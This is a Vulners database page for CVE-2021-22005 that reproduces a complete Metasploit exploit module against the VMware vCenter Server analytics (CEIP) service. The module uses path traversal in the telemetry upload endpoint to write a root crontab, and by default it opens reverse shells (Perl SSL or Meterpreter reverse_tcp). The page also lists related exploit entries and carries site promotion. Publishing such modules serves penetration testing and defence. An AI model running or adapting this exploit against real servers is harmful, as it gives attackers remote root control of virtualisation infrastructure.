Vulners
Lucene search
VMware vCenter Server Analytics (CEIP) Service File Upload
| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Vmware Cloud_Foundation | 8 Dec 202123:44 | – | gitee |
 | VMware vCenter Server Analytics (CEIP) Service File Upload Exploit | 7 Oct 202100:00 | – | zdt |
 | Exploit for Path Traversal in Vmware Cloud_Foundation | 24 Oct 202123:14 | – | githubexploit |
| Exploit for CVE-2021-22006 | 26 Sep 202101:02 | – | githubexploit |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 25 Sep 202107:19 | – | githubexploit |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 27 Oct 202108:36 | – | githubexploit |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 2 Oct 202107:32 | – | githubexploit |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 4 Oct 202203:39 | – | githubexploit |
 | Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors | 6 Oct 202212:00 | – | ics |
 | CVE-2021-22005 | 23 Sep 202100:00 | – | attackerkb |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',
'Description' => %q{
This module exploits a file upload in VMware vCenter Server's
analytics/telemetry (CEIP) service to write a system crontab and
execute shell commands as the root user.
Note that CEIP must be enabled for the target to be exploitable by
this module. CEIP is enabled by default.
},
'Author' => [
'George Noseevich', # Discovery
'Sergey Gerasimov', # Discovery
'VMware', # Initial PoC
'Derek Abdine', # Analysis
'wvu' # Analysis and exploit
],
'References' => [
['CVE', '2021-22005'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],
['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],
['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],
['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']
],
'DisclosureDate' => '2021-09-21',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'WfsDelay' => 60
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),
'vars_get' => {
'_c' => ''
}
)
return CheckCode::Unknown unless res
unless res.code == 200 && res.body == '"FULL"'
return CheckCode::Safe('CEIP is not fully enabled.')
end
CheckCode::Appears('CEIP is fully enabled.')
end
def exploit
print_status('Creating path traversal')
unless write_file(rand_text_alphanumeric(8..16))
fail_with(Failure::NotVulnerable, 'Failed to create path traversal')
end
print_good('Successfully created path traversal')
print_status("Executing #{payload_instance.refname} (#{target.name})")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
print_warning("Please wait up to #{wfs_delay} seconds for a session")
end
def execute_command(cmd, _opts = {})
print_status("Writing system crontab: #{crontab_path}")
crontab_file = crontab(cmd)
vprint_line(crontab_file)
unless write_file("../../../../../../etc/cron.d/#{crontab_name}", crontab_file)
fail_with(Failure::PayloadFailed, 'Failed to write system crontab')
end
print_good('Successfully wrote system crontab')
end
def write_file(path, data = nil)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),
'ctype' => 'application/json',
'vars_get' => {
'_c' => '',
'_i' => "/#{path}"
},
'data' => data
)
return false unless res&.code == 201
true
end
def crontab(cmd)
# https://man7.org/linux/man-pages/man5/crontab.5.html
<<~CRONTAB.strip
* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/
* * * * * root #{cmd}
CRONTAB
end
def crontab_path
"/etc/cron.d/#{crontab_name}.json"
end
def crontab_name
@crontab_name ||= rand_text_alphanumeric(8..16)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Oct 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.94445